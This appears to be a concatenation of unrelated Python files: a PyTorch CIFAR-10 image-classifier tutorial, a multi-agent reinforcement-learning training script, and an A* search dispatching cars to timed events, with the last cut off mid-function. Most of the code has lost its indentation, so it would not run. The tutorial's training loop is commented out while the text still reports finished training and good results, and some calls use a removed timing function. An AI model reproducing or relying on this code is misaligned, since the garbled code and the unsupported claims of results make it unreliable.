For images, packages such as Pillow and OpenCV are useful
For audio, packages such as scipy and librosa
For text, either raw Python or Cython based loading, or NLTK and SpaCy
'''
'''
Specifically for vision, there is a package called torchvision,
which has data loaders for common datasets such as Imagenet, CIFAR10 and MNIST
(torchvision.datasets), as well as image transforms and torch.utils.data.DataLoader.
'''
'''
For this tutorial, we will use the CIFAR10 dataset.
It has ten classes: 'airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'.
The images in CIFAR-10 are of size 3x32x32, i.e. 3 RGB colour channels of 32x32 pixels each.
'''
'''
Training an image classifier
We will do the following steps in order:
1. Load and normalize the CIFAR10 training and test datasets using torchvision
2. Define a Convolutional Neural Network
3. Define a loss function
4. Train the network on the training data
5. Test the network on the test data
'''
'''Load and normalize CIFAR10: using torchvision, it is extremely easy to load CIFAR10.'''
import torch
import torchvision
import torchvision.transforms as transforms
'''The output of torchvision datasets are PILImage images in the range [0, 1]. We transform them to Tensors normalized to the range [-1, 1].'''
transform = transforms.Compose(
[transforms.ToTensor(),transforms.Normalize((0.5,0.5,0.5),(0.5,0.5,0.5))]
)
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)  # the dataset is downloaded automatically
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4, shuffle=True, num_workers=2)  # note the batch_size
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False, num_workers=2)  # shuffle=False keeps the test order fixed
classes = ('plane', 'car', 'bird', 'cat',
           'deer', 'dog', 'frog', 'horse', 'ship', 'truck')  # this is a tuple
# Let us show some of the training images.
import matplotlib.pyplot as plt
import numpy as np
def imshow(img):
    img = img / 2 + 0.5  # unnormalize
    npimg = img.numpy()
    plt.imshow(np.transpose(npimg, (1, 2, 0)))  # transpose (C, H, W) -> (H, W, C) for matplotlib
    plt.show()
dataiter = iter(trainloader)  # get an iterator over the training loader
images, labels = next(dataiter)  # the iterator yields one (images, labels) batch at a time
# show images
imshow(torchvision.utils.make_grid(images))  # make_grid tiles the batch into a single image
print(' '.join('%5s' % classes[labels[j]] for j in range(4)))  # 4 because batch_size = 4
'''Define a convolutional neural network: copy the network from the Neural Networks section and modify it to take 3-channel images (instead of the 1-channel images it was defined for).'''
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net,self).__init__()
self.conv1 = nn.Conv2d(3,6,5)
        self.pool = nn.MaxPool2d(2,2) # 2x2 max pooling (kernel size 2, stride 2)
        self.conv2 = nn.Conv2d(6,16,5) # the last argument is the kernel size
self.fc1 = nn.Linear(16 * 5*5,120)
self.fc2 = nn.Linear(120,84)
self.fc3 = nn.Linear(84,10)
    def forward(self,x): # the forward pass
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1,16*5*5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
net = Net()
'''Define a loss function and optimizer: let us use a classification Cross-Entropy loss and SGD with momentum.'''
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(),lr = 0.001, momentum = 0.9) # the optimizer updates the parameters from the gradients computed in backprop
'''Train the network. This is when things start to get interesting:
we simply have to loop over our data iterator, and feed the inputs to the network and optimize.'''
# for epoch in range(2):
# running_loss = 0.0
# for i, data in enumerate(trainloader,0):
# inputs,labels = data
# optimizer.zero_grad()
# output = net(inputs)
# loss = criterion(output,labels)
# loss.backward()
# optimizer.step()
#
# running_loss +=loss.item()
# if i%2000 == 1999:
# print('[%d, %5d] loss: %.3f' %
# (epoch + 1, i + 1, running_loss / 2000))
# running_loss = 0.0
print('Finished Training')
'''OK, first step: let us display an image from the test set to get familiar with it.'''
outputs = net(images)
'''The outputs are energies for the ten classes: the higher the energy for a class,
the more the network thinks the image belongs to that class. So let us print the most likely class label:'''
_, predicted = torch.max(outputs, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]]for j in range(4)))
# The results look pretty good; let us look at how the network performs on the whole dataset.
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
images, labels = data
outputs = net(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
'''That looks better than chance, which is 10% accuracy (randomly picking one of the 10 classes). It seems the network has learnt something.'''
# class_correct = list(0. for i in range(10))
# class_total = list(0. for i in range(10))
# with torch.no_grad():
# for data in testloader:
# images,labels = data
# outputs = net(images)
# _,predicted = torch.max(outputs,1)
# c = (predicted == labels).squeeze()
# for i in range(4):
# label = labels[i]
# class_correct[label] +=c[i].item()
#             class_total[label] += 1
#
# for i in range(10):
# print('Accuracy of %5s : %2d %%' % (
# classes[i], 100 * class_correct[i] / class_total[i]))
'''So what next?
How do we run these neural networks on the GPU?
Training on the GPU: just like you transfer a Tensor onto the GPU, you transfer the neural net onto the GPU.
If CUDA is available, let us first define our device as the first visible cuda device.'''
device = torch.device('cuda:0' if torch.cuda.is_available() else "cpu")
print(device)
'''These methods will then recursively go over all modules and convert their parameters and buffers to CUDA tensors.'''
net.to(device)
'''Remember that you also have to send the inputs and targets to the GPU at every step:'''
# inputs, labels = inputs.to(device), labels.to(device)  # belongs inside the training loop; kept commented here since the loop above is commented out
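# Hedged sketch (not in the original tutorial text): the GPU variant of one
# training pass, assuming the commented-out training loop above is enabled.
# for i, data in enumerate(trainloader, 0):
#     inputs, labels = data[0].to(device), data[1].to(device)
#     optimizer.zero_grad()
#     outputs = net(inputs)
#     loss = criterion(outputs, labels)
#     loss.backward()
#     optimizer.step()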
|
from .text_mel_dataset import TextMelDataset, text_mel_collate
|
'''
Demo run file for different algorithms and Mujoco tasks.
'''
import numpy as np
import torch
import gym
import argparse
import ma_utils
import algorithms.mpe_new_maxminMADDPG as MA_MINE_DDPG
import math
import os
from tensorboardX import SummaryWriter
from multiprocessing import cpu_count
from maddpg.utils.env_wrappers import SubprocVecEnv, DummyVecEnv
import time
cpu_num = 1
os.environ['OMP_NUM_THREADS'] = str(cpu_num)
os.environ['OPENBLAS_NUM_THREADS'] = str(cpu_num)
os.environ['MKL_NUM_THREADS'] = str(cpu_num)
os.environ['VECLIB_MAXIMUM_THREADS'] = str(cpu_num)
os.environ['NUMEXPR_NUM_THREADS'] = str(cpu_num)
torch.set_num_threads(cpu_num)
def make_parallel_env(env_id, n_rollout_threads, seed, discrete_action):
def get_env_fn(rank):
def init_env():
env = make_env(env_id, discrete_action=discrete_action)
env.seed(seed + rank * 1000)
np.random.seed(seed + rank * 1000)
return env
return init_env
if n_rollout_threads == 1:
return DummyVecEnv([get_env_fn(0)])
else:
return SubprocVecEnv([get_env_fn(i) for i in range(n_rollout_threads)])
def natural_exp_inc(init_param, max_param, global_step, current_step, inc_step=1000, inc_rate=0.5, stair_case=False):
p = (global_step - current_step) / inc_step
if stair_case:
p = math.floor(p)
increased_param = min((max_param - init_param) * math.exp(-inc_rate * p) + init_param, max_param)
return increased_param
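# Hedged illustration (not part of the original script): natural_exp_inc
# returns (max_param - init_param) * exp(-inc_rate * p) + init_param with
# p = (global_step - current_step) / inc_step, so the value decays from
# max_param towards init_param as the gap between the steps grows, e.g.
# natural_exp_inc(0.1, 1.0, global_step=2000, current_step=0)  # ~0.43 with the defaults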
def make_env(scenario_name, benchmark=False,discrete_action=False):
'''
Creates a MultiAgentEnv object as env. This can be used similar to a gym
environment by calling env.reset() and env.step().
Use env.render() to view the environment on the screen.
Input:
        scenario_name : name of the scenario from ./scenarios/ to be loaded
(without the .py extension)
benchmark : whether you want to produce benchmarking data
(usually only done during evaluation)
Some useful env properties (see environment.py):
.observation_space : Returns the observation space for each agent
.action_space : Returns the action space for each agent
.n : Returns the number of Agents
'''
from multiagent.environment import MultiAgentEnv
import multiagent.scenarios as scenarios
# load scenario from script
scenario = scenarios.load(scenario_name + ".py").Scenario()
# create world
world = scenario.make_world()
# create multiagent environment
if benchmark:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation, scenario.benchmark_data)
else:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation )
return env
# Runs policy for X episodes and returns average reward
def evaluate_policy(policy, eval_episodes=10):
avg_reward = 0.
num_step = 0
for _ in range(eval_episodes):
obs = env.reset()
done = False
ep_step_num = 0
#print("obs ",obs)
while ep_step_num < 50:
t = ep_step_num / 1000
obs_t = []
for i in range(n_agents):
obs_t_one = list(obs[i])
obs_t.append(obs_t_one)
obs_t = np.array(obs_t)
num_step +=1
scaled_a_list = []
for i in range(n_agents):
#print("obs_t[i]",obs_t[i])
a = policy.select_action(obs_t[i], i)
scaled_a = np.multiply(a, 1.0)
scaled_a_list.append(scaled_a)
action_n = [[0, a[0], 0, a[1], 0] for a in scaled_a_list]
next_obs, reward, done, _ = env.step(action_n)
next_state = next_obs[0]
obs = next_obs
ep_step_num += 1
avg_reward += reward[0]
avg_reward /= eval_episodes
print("---------------------------------------")
print("Evaluation over %d episodes: %f" % (eval_episodes, avg_reward))
print("---------------------------------------")
return avg_reward,num_step/eval_episodes
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--policy_name", default="DDPG") # Policy name
parser.add_argument("--env_name", default="HalfCheetah-v1") # OpenAI gym environment name
parser.add_argument("--seed", default=1, type=int) # Sets Gym, PyTorch and Numpy seeds
parser.add_argument("--batch_size", default=1024, type=int) # Batch size for both actor and critic
parser.add_argument("--discount", default=0.95, type=float) # Discount factor
parser.add_argument("--tau", default=0.01, type=float) # Target network update rate
parser.add_argument("--policy_freq", default=2, type=int) # Frequency of delayed policy updates
parser.add_argument("--freq_test_mine", default=5e3, type=float)
parser.add_argument("--gpu-no", default='-1', type=str) # GPU number, -1 means CPU
parser.add_argument("--MI_update_freq", default=1, type=int)
parser.add_argument("--max_adv_c", default=0.0, type=float)
parser.add_argument("--min_adv_c", default=0.0, type=float)
parser.add_argument("--discrete_action",action='store_true')
args = parser.parse_args()
file_name = "PMIC_%s_%s_%s_%s_%s"% (args.MI_update_freq,args.max_adv_c,args.min_adv_c,args.env_name,args.seed)
writer = SummaryWriter(log_dir="./tensorboard/" + file_name)
output_dir="./output/" + file_name
model_dir = "./model/" + file_name
if os.path.exists(output_dir) is False :
os.makedirs(output_dir)
if os.path.exists(model_dir) is False :
os.makedirs(model_dir)
print("---------------------------------------")
print("Settings: %s" % (file_name))
print("---------------------------------------")
import os
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_no
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
env = make_parallel_env(args.env_name, 1, args.seed,
args.discrete_action)
env = make_env(args.env_name)
env = env.unwrapped
#env = gym.make(args.env_name)
# Set seeds
env.seed(args.seed)
n_agents = env.n
obs_shape_n = [env.observation_space[i].shape[0] for i in range(env.n)]
print("obs_shape_n ",obs_shape_n)
ac = [env.action_space[i].shape for i in range(env.n)]
action_shape_n = [2 for i in range(env.n)]
print("env .n ",env.n)
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.manual_seed(args.seed)
np.random.seed(args.seed)
policy = MA_MINE_DDPG.MA_T_DDPG(n_agents,obs_shape_n,sum(obs_shape_n), action_shape_n, 1.0, device,0.0,0.0)
replay_buffer = ma_utils.ReplayBuffer(1e6)
good_data_buffer = ma_utils.embedding_Buffer(1e3)
bad_data_buffer = ma_utils.embedding_Buffer(1e3)
total_timesteps = 0
timesteps_since_eval = 0
episode_num = 0
episode_reward = 0
done = True
get_epoch_Mi = False
Mi_list = []
data_recorder = []
replay_buffer_recorder =[]
moving_avg_reward_list = []
embedding_recorder=[]
best_reward_start = -1
reward_list =[]
eposide_reward_list =[]
recorder_reward = 0
best_reward = -100000000000
eposide_num = -1
current_policy_performance = -1000
episode_timesteps = 25
start_time = time.time()
t1 = time.time()
while total_timesteps < 40e5:
if episode_timesteps == 25:
eposide_num +=1
for d in replay_buffer_recorder:
replay_buffer.add(d,episode_reward)
if total_timesteps != 0:
# walker 50
if len(good_data_buffer.pos_storage_reward) != 0:
if len(moving_avg_reward_list) >=10:
move_avg = np.mean(moving_avg_reward_list[-1000:])
current_policy_performance = move_avg
lowest_reward = good_data_buffer.rank_storage(-100000)
mean_reward = np.mean(good_data_buffer.pos_storage_reward)
if len(moving_avg_reward_list) >=10:
#writer.add_scalar("data/tp_lowest_reward", lowest_reward, total_timesteps)
if lowest_reward < move_avg:
lowest_reward = move_avg
else :
lowest_reward = -500
mean_reward = 0
if lowest_reward < episode_reward:
Obs_list = []
State_list = []
Action_list = []
for d in data_recorder:
obs = d[0]
state = d[1]
Action_list.append(d[2])
Obs_list.append(obs)
State_list.append(state)
for index in range(len(Action_list)):
good_data_buffer.add_pos((Action_list[index], Obs_list[index], State_list[index]),episode_reward)
else :
Obs_list = []
State_list = []
Action_list = []
for d in data_recorder:
obs = d[0]
state = d[1]
Action_list.append(d[2])
Obs_list.append(obs)
State_list.append(state)
for index in range(len(Action_list)):
bad_data_buffer.add_pos((Action_list[index], Obs_list[index], State_list[index]),episode_reward)
# org 10
if len(moving_avg_reward_list) % 10 == 0 :
writer.add_scalar("data/reward", np.mean(moving_avg_reward_list[-1000:]), total_timesteps)
writer.add_scalar("data/data_in_pos", np.mean(good_data_buffer.pos_storage_reward), total_timesteps)
if episode_num%1000 == 0 :
print('Total T:', total_timesteps, 'Episode Num:', episode_num, 'Episode T:', episode_timesteps, 'Reward:', np.mean(moving_avg_reward_list[-1000:])/3.0, " time cost:", time.time() - t1)
t1 = time.time()
if total_timesteps >= 1024 and total_timesteps%100 == 0:
sp_actor_loss_list =[]
process_Q_list = []
process_min_MI_list = []
process_max_MI_list = []
process_min_MI_loss_list = []
process_max_MI_loss_list = []
Q_grads_list =[]
MI_grads_list =[]
for i in range(1):
if len(good_data_buffer.pos_storage)< 500:
process_Q = policy.train(replay_buffer, 1, args.batch_size, args.discount, args.tau)
process_min_MI = 0
process_min_MI_loss = 0
min_mi = 0.0
min_mi_loss = 0.0
process_max_MI = 0
pr_sp_loss = 0.0
Q_grads = 0.0
MI_grads =0.0
process_max_MI_loss = 0.0
else :
if total_timesteps % (args.MI_update_freq*100) == 0 :
if args.min_adv_c > 0.0 :
process_min_MI_loss = policy.train_club(bad_data_buffer, 1, batch_size=args.batch_size)
else :
process_min_MI_loss = 0.0
if args.max_adv_c > 0.0 :
process_max_MI_loss,_ = policy.train_mine(good_data_buffer, 1, batch_size=args.batch_size)
else:
process_max_MI_loss = 0.0
else :
process_min_MI_loss = 0.0
process_max_MI_loss = 0.0
process_Q,process_min_MI ,process_max_MI, Q_grads,MI_grads = policy.train_actor_with_mine(replay_buffer, 1, args.batch_size,args.discount, args.tau,max_mi_c=0.0,min_mi_c=0.0 ,min_adv_c=args.min_adv_c, max_adv_c=args.max_adv_c )
process_max_MI_list.append(process_max_MI)
process_Q_list.append(process_Q)
Q_grads_list.append(Q_grads)
MI_grads_list.append(MI_grads)
process_max_MI_loss_list.append(process_max_MI_loss)
process_min_MI_list.append(process_min_MI)
process_min_MI_loss_list.append(process_min_MI_loss)
if len(moving_avg_reward_list) % 10 == 0 :
writer.add_scalar("data/MINE_lower_bound_loss", np.mean(process_max_MI_loss_list), total_timesteps)
writer.add_scalar("data/process_Q", np.mean(process_Q_list), total_timesteps)
writer.add_scalar("data/club_upper_bound_loss", np.mean(process_min_MI_loss_list), total_timesteps)
obs = env.reset()
state = np.concatenate(obs, -1)
#print("ep reward ", episode_reward)
moving_avg_reward_list.append(episode_reward)
#obs = env.reset()
#writer.add_scalar("data/run_reward", episode_reward, total_timesteps)
done = False
explr_pct_remaining = max(0, 25000 - episode_num) / 25000
policy.scale_noise( 0.3 * explr_pct_remaining)
policy.reset_noise()
episode_reward = 0
reward_list = []
eposide_reward_list = []
episode_timesteps = 0
episode_num += 1
data_recorder = []
replay_buffer_recorder =[]
best_reward_start = -1
best_reward = -1000000
# FIXME 1020
Mi_list = []
# Select action randomly or according to policy
scaled_a_list = []
for i in range(n_agents):
a = policy.select_action(obs[i], i)
scaled_a = np.multiply(a, 1.0)
scaled_a_list.append(scaled_a)
if args.env_name == "simple_reference":
action_n = np.array([[0, a[0], 0, a[1],0, a[2],a[3]] for a in scaled_a_list])
# Perform action
elif args.env_name == "simple":
action_n = np.array([[a[0], a[1]] for a in scaled_a_list])
else :
action_n = np.array([[0, a[0], 0, a[1],0] for a in scaled_a_list])
#print(action_n)
next_obs, reward, done, _ = env.step(action_n)
reward = reward[0]
next_state = np.concatenate(next_obs, -1)
done = all(done)
terminal = (episode_timesteps + 1 >= 25)
done_bool = float(done or terminal)
episode_reward += reward
eposide_reward_list.append(reward)
# Store data in replay buffer
replay_buffer_recorder.append((obs, state,next_state,next_obs, np.concatenate(scaled_a_list,-1), reward, done))
data_recorder.append([obs, state, scaled_a_list])
obs = next_obs
state = next_state
episode_timesteps += 1
total_timesteps += 1
timesteps_since_eval += 1
print("total time ",time.time()-start_time)
policy.save(total_timesteps, "model/" + file_name)
writer.close()
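    # Hedged usage sketch (not part of the original script): a typical launch,
    # with made-up flag values and script name for illustration only.
    #   python run_pmic_mpe.py --env_name simple_spread --seed 1 \
    #       --max_adv_c 0.1 --min_adv_c 0.1 --MI_update_freq 1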
|
from copy import deepcopy
from enum import Enum
import itertools
import numpy as np
import heapq, time
from scipy.spatial.distance import cdist
import pickle
from matplotlib import pyplot as plt
import imageio
class Status(Enum):
PREOPENED = 0
OPENED = 1
CLOSED = 2
CANCELED = 3
class Car:
def __init__(self, position, id):
"""
:param position: cartesian coordinate tuple
:param id: integeral id, uniqe with respect to other cars in simulation
"""
self.position = np.reshape(position, (2,))
self.id = id
self.commited = False
self.targetId = None
self.path = [self.position]
return
def __lt__(self, other):
if not isinstance(other, Car):
raise Exception("other must be of type Car.")
else:
return self.id<=other.id
def __eq__(self, other):
if not isinstance(other, Car):
raise Exception("other must be of type Car.")
elif self.id==other.id:
raise Exception("Duplicate car Ids used.")
else:
return False
def __hash__(self):
return hash((self.id, self.position[0], self.position[1]))
def createCopy(self):
" return a deep copy of the car"
return deepcopy(self)
def commit(self, targetId):
"""
commits a car to the target
:param targetId: event to commit car to
:return: None
"""
self.commited = True
self.targetId = targetId
return
def uncommit(self):
self.commited = False
self.targetId = None
def fullEq(self, other):
psEq = np.array_equal(self.position, other.position)
idEq = self.id == other.id
cmEq = self.commited == other.commited
trEq = self.targetId == other.targetId
return psEq and idEq and cmEq and trEq
class Event:
def __init__(self, position, id, start, end):
"""
:param position: xcartesian coordinate tuple
:param id: integral id, unique with respect to other events
:param start: integral start time
:param end: integral end time
"""
self.id = id
self.position = np.reshape(position, (2,))
self.commited = False
self.startTime = start
self.endTime = end
self.status = Status.PREOPENED
return
def __lt__(self, other):
if not isinstance(other, Event):
raise Exception("Other must be of type Event")
else:
return self.id<=other.id
def __eq__(self, other):
if not isinstance(other, Event):
raise Exception("other must be of type Event.")
elif self.id==other.id:
raise Exception("Duplicate event Ids used.")
else:
return False
def __hash__(self):
return hash(self.id)
def commit(self, timeDelta):
self.commited = True
self.endTime += timeDelta
return
def createCopy(self):
return deepcopy(self)
def updateStatus(self):
prev = self.status
if self.status == Status.CLOSED or self.status == Status.CANCELED:
pass
elif self.startTime<=0 and self.endTime>=0:
self.status = Status.OPENED
elif self.endTime<0:
self.status = Status.CANCELED
else:
pass
if self.status != prev:
return self.status
else:
return None
def fullEq(self, other):
idEq = self.id == other.id
psEq = np.array_equal(self.position, other.position)
cmEq = self.commited == other.commited
stEq = self.startTime == other.startTime
etEq = self.endTime == other.endTime
sttEq = self.status == other.status
return idEq and psEq and cmEq and stEq and etEq and sttEq
class commitMonitor:
def __init__(self,commitedDict,notCommitedDict):
self.commited = commitedDict
self.notCommited = notCommitedDict
def commitObject(self, id):
if id in self.commited.keys():
raise Exception("error, object is already in commited Dict!")
else:
objectToCommit = self.notCommited.pop(id)
self.commited[id] = objectToCommit
def unCommitObject(self, id):
if id in self.notCommited.keys():
raise Exception("error, object is already in not commited Dict!")
else:
objectToUnCommit = self.commited.pop(id)
self.notCommited[id] = objectToUnCommit
def getObject(self, id):
if id in self.commited:
return self.commited[id]
elif id in self.notCommited:
return self.notCommited[id]
else:
raise Exception("no object with given id.")
def getCommitedKeys(self):
return self.commited.keys()
def getUnCommitedKeys(self):
return self.notCommited.keys()
def length(self):
return len(self.commited)+len(self.notCommited)
class SearchState:
def __init__(self,root , carMonitor, eventMonitor, cost, parent, time, weight=1, cancelPenalty=50, closeReward=10, timeDelta=5, eps=0.001):
self.cars = carMonitor
self.events = eventMonitor
self.gval = cost
self.hval = float('Inf')
self.weight = weight
self.cancelPenalty = cancelPenalty
self.closeReward = closeReward
self.parent = parent
self.root = root
self.td = timeDelta
self.time = time
self.eps = eps
return
def __lt__(self, other):
if not isinstance(other, SearchState):
raise Exception("States must be compared to another State object.")
else:
return self.getFval()<=other.getFval()
def __eq__(self, other):
if not isinstance(other, SearchState):
raise Exception("States must be compared to another State object.")
else:
# check time equality
if self.time!=other.time:
return False
# check commited car equality
for k in self.cars.getCommitedKeys():
if self.cars.getObject(k).fullEq(other.cars.getObject(k)):
continue
else:
return False
# check not commited car equality
for k in self.cars.getUnCommitedKeys():
if self.cars.getObject(k).fullEq(other.cars.getObject(k)):
continue
else:
return False
# check commited events equality
for k in self.events.getCommitedKeys():
if self.events.getObject(k).fullEq(other.events.getObject(k)):
continue
else:
return False
# check not commited events equality
for k in self.events.getUnCommitedKeys():
if self.events.getObject(k).fullEq(other.events.getObject(k)):
continue
else:
return False
# all checks passed
return True
def __hash__(self):
cmHash = [hash(self.cars.getObject(k)) for k in self.cars.getCommitedKeys()]
ncmHash = [hash(self.cars.getObject(k)) for k in self.cars.getUnCommitedKeys()]
return hash(tuple(cmHash+ncmHash))
def getFval(self):
return self.gval+self.hval*self.weight
def path(self):
current = self
p = []
while current is not None:
if not current.root:
p.append(current)
current = current.parent
else:
p.append(current)
p.reverse()
return p
def goalCheck(self):
# check commited events
for k in self.events.getCommitedKeys():
opened = self.events.getObject(k).status == Status.OPENED
pre = self.events.getObject(k).status == Status.PREOPENED
if opened or pre:
return False
# check uncommited events
for k in self.events.getUnCommitedKeys():
opened = self.events.getObject(k).status == Status.OPENED
pre = self.events.getObject(k).status == Status.PREOPENED
if opened or pre:
return False
# all are either closed or canceled
return True
def commitCars(self, commit):
for carId,eventId in commit:
# update car
self.cars.getObject(carId).commit(eventId)
self.cars.commitObject(carId)
# update event
self.events.getObject(eventId).commit(self.td)
self.events.commitObject(eventId)
return
def moveCars(self, move):
# uncommited
for i,k in enumerate(self.cars.getUnCommitedKeys()):
tempCar = self.cars.getObject(k)
            tempCar.path.append(tempCar.position.copy())  # copy so the in-place move below does not rewrite the stored history
            tempCar.position += move[i, :]
# commited cars
for k in self.cars.getCommitedKeys():
tempCar = self.cars.getObject(k)
            tempCar.path.append(tempCar.position.copy())
            targetPosition = self.events.getObject(tempCar.targetId).position
            delta = targetPosition - tempCar.position  # step one cell towards the committed target
            if delta[0]!=0:
                tempCar.position[0] += np.sign(delta[0])
            else:
                tempCar.position[1] += np.sign(delta[1])
return
def updateStatus(self, matrix):
# update event status
counter = {Status.OPENED : 0, Status.CLOSED: 0, Status.CANCELED: 0}
for eventId in range(self.events.length()):
tempEvent = self.events.getObject(eventId)
tempEvent.startTime -= 1
tempEvent.endTime -= 1
newStatus = tempEvent.updateStatus()
if newStatus is not None:
counter[newStatus] += 1
# update commited cars and events
for carId in range(self.cars.length()):
tempCar = self.cars.getObject(carId)
if tempCar.commited:
if matrix[carId, tempCar.targetId]<=self.eps and self.events.getObject(tempCar.targetId).status==Status.OPENED:
self.events.getObject(tempCar.targetId).status = Status.CLOSED # update event status
self.events.unCommitObject(tempCar.targetId) # uncommit event
self.cars.unCommitObject(carId) # uncommit car
tempCar.uncommit() # update car field
counter[Status.CLOSED] += 1
else: # update uncommited events
closedEvents = np.where(matrix[carId, :]<=self.eps)
for e in closedEvents[0]:
tempEvent = self.events.getObject(e)
if tempEvent.status==Status.OPENED and not tempEvent.commited: # uncommited event reached
tempEvent.status = Status.CLOSED # close event
counter[Status.CLOSED] += 1 # incriment counter
return counter
def getDistanceMatrix(self):
# create distance matrix
carPositions = np.vstack([self.cars.getObject(i).position for i in range(self.cars.length())])
evePositions = np.vstack([self.events.getObject(i).position for i in range(self.events.length())])
matrix = cdist(carPositions, evePositions, metric="cityblock")
return matrix
def updateCost(self, counter, move):
cost = 0
cost += np.sum(move)
cost += len(self.cars.commited)
cost += counter[Status.OPENED]
cost += counter[Status.CANCELED]*self.cancelPenalty
cost -= counter[Status.CLOSED]*self.closeReward
self.gval += cost
return
def updateHeuristic(self, matrix):
# commited events
h1 = 0
for carId in self.cars.getCommitedKeys():
tempCar = self.cars.getObject(carId)
closeTime = self.events.getObject(tempCar.targetId).endTime
dist = matrix[carId, tempCar.targetId]
if dist<=closeTime:
h1 -= self.closeReward
else:
h1 += self.cancelPenalty
# uncommited events
h2 = 0
for eventId in self.events.getUnCommitedKeys():
tempEvent = self.events.getObject(eventId)
startTime = tempEvent.startTime
closeTime = tempEvent.endTime
minDist = np.min(matrix[:, eventId])
if minDist-closeTime>0:
h2 += self.cancelPenalty
else:
h2 += np.max([minDist-startTime, 0]) + minDist - self.closeReward
self.hval = h1 + h2
return
class Heap:
def __init__(self):
self.array = list()
def __len__(self):
return len(self.array)
def insert(self, obj):
heapq.heappush(self.array, obj)
return
def extractMin(self):
return heapq.heappop(self.array) # get minimum from heap
def empty(self):
return len(self.array)==0
def heapify(self):
heapq.heapify(self.array)
return
def moveGenerator(numCars):
moveIter = itertools.product([(0,0), (0,1), (0,-1), (-1,0), (1,0)], repeat=numCars)
for move in moveIter:
yield np.array(move).astype(np.int8)
def commitGenerator(carIdList, eventIdList):
if len(eventIdList):
numOptionalCommits = np.min([len(carIdList)+1, len(eventIdList)+1])
for i in range(numOptionalCommits):
for carChoice in itertools.combinations(carIdList, i):
for eventChoice in itertools.combinations(eventIdList, i):
for eventChoicePermutations in itertools.permutations(eventChoice, len(eventChoice)):
yield list(zip(carChoice, eventChoicePermutations))
def descendentGenerator(state):
commitGen = commitGenerator(list(state.cars.getUnCommitedKeys()), list(state.events.getUnCommitedKeys()))
for commit in commitGen:
# commit cars
newCommitState = deepcopy(state)
# update root,parent and time for all descendants
newCommitState.root = False
newCommitState.parent = state
newCommitState.time += 1
newCommitState.commitCars(commit)
numUnCommitedCars = len(newCommitState.cars.notCommited)
moveGen = moveGenerator(numUnCommitedCars)
for possibleMove in moveGen:
# create copy for new descendent
newMoveState = deepcopy(newCommitState)
# move the cars according to possible move
newMoveState.moveCars(possibleMove)
# calc distance matrix between cars and events
dm = newMoveState.getDistanceMatrix()
# update status of events relative to new car positions
counter = newMoveState.updateStatus(dm)
# update cost: sum of new cost and previous state cost
newMoveState.updateCost(counter, possibleMove)
# update heuristic: heuristic of new state
newMoveState.updateHeuristic(dm)
# yield the new state
yield newMoveState
def aStar(initState, shouldPrint=False):
# start timers
    t0 = time.perf_counter()  # time.clock() was removed in Python 3.8
calcTime = 0
objectCreationTime = 0
# create heap
openHeap = Heap()
closed = {}
# insert initial state
openHeap.insert(initState)
cnt = 0
while not openHeap.empty():
current = openHeap.extractMin()
if (current not in closed) or (current in closed and closed[current]>current.gval):
# remove previous equivalent state, and enter the new one
closed[current] = current.gval
# check if current state is a goal state, return path if it is
if current.goalCheck():
if shouldPrint:
print("solution found. Total Time: {0}, Total States explored: {1}".format(round(time.clock()-t0, 4), len(closed) + len(openHeap)))
print("rep count: {0}, calc time: {1}, object creation time: {2}".format(cnt, calcTime, objectCreationTime))
return current.path()
# calculate all possible following states
for descendent in descendentGenerator(current):
# check if is in closed
if (descendent in closed) and (descendent.gval<closed[descendent]):
closed.pop(descendent) # remove from closed
openHeap.insert(descendent) # add to open
else:
openHeap.insert(descendent) # fresh state, insert into the existing heap
if shouldPrint:
print("solution not found. Total Time: {0}, Total States explored: {1}".format(round(time.clock()-t0,4), len(closed) + len(openHeap)))
print("rep count: {0}, calc time: {1}, object creation time: {2}".format(cnt, calcTime, objectCreationTime))
return None # no solution exists
def main():
np.random.seed(10)
deltaTimeForCommit = 5
closeReward = 10
cancelPenalty = 50
gridSize = 4
deltaOpenTime = 5
numCars = 1
numEvents = 4
maxTime = 20
carPos = np.reshape(np.random.randint(0, gridSize, 2 * numCars), (2,numCars))
eventPos = np.reshape(np.random.randint(0, gridSize, 2 * numEvents), ( 2,numEvents))
eventStartTime = np.random.randint(0, maxTime, numEvents)
eventEndTime = deltaOpenTime + eventStartTime
# carPos = np.array([0,0]).reshape(2,numCars)
# eventPos = np.array([[5,5],[5,10]])
# eventStartTime = np.array([5,10])
# eventEndTime = eventStartTime + deltaOpenTime
uncommitedCarDict = {}
commitedCarDict = {}
uncommitedEventDict = {}
commitedEventDict = {}
for i in range(numCars):
tempCar = Car(carPos[:,i],i)
uncommitedCarDict[i] = tempCar
for i in range(numEvents):
tempEvent = Event(eventPos[:,i],i,eventStartTime[i],eventEndTime[i])
uncommitedEventDict[i] = tempEvent
carMonitor = commitMonitor(commitedCarDict,uncommitedCarDict)
eventMonitor = commitMonitor(commitedEventDict,uncommitedEventDict)
initState = SearchState(root = True,carMonitor= carMonitor,eventMonitor = eventMonitor,cost = 0,parent = None,time = 0,weight =1,cancelPenalty=cancelPenalty,closeReward=closeReward,timeDelta=deltaTimeForCommit,eps = 0.001)
    stime = time.perf_counter()
p = aStar(initState)
    etime = time.perf_counter()
runTime = etime - stime
print('cost is:' + str(p[-1].gval))
print('run time is: '+str(runTime))
actualMaxTime = len(p)
